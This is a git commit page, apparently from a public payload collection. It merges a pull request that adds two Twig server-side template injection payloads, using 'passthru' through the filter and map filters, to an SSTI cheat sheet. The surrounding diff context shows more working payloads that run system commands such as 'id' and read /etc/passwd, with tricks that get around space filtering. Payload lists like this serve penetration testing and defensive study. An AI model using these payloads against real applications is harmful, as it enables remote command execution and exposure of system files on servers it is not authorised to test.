Merge pull request #639 from TomWilford/master

Added Twig 'passthru' filter exploits
swisskyrepo · Apr 28, 2023 · 55df531 · 55df531
2 parents 1e66a42 + c1dc141
commit 55df531
Showing 1 changed file with 2 additions and 0 deletions.
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
@@ -966,6 +966,8 @@ $output = $twig > render (
 {{['id',1]|sort('system')|join}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id']|filter('passthru')}}
+{{['id']|map('passthru')}}
 ```
 
 Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)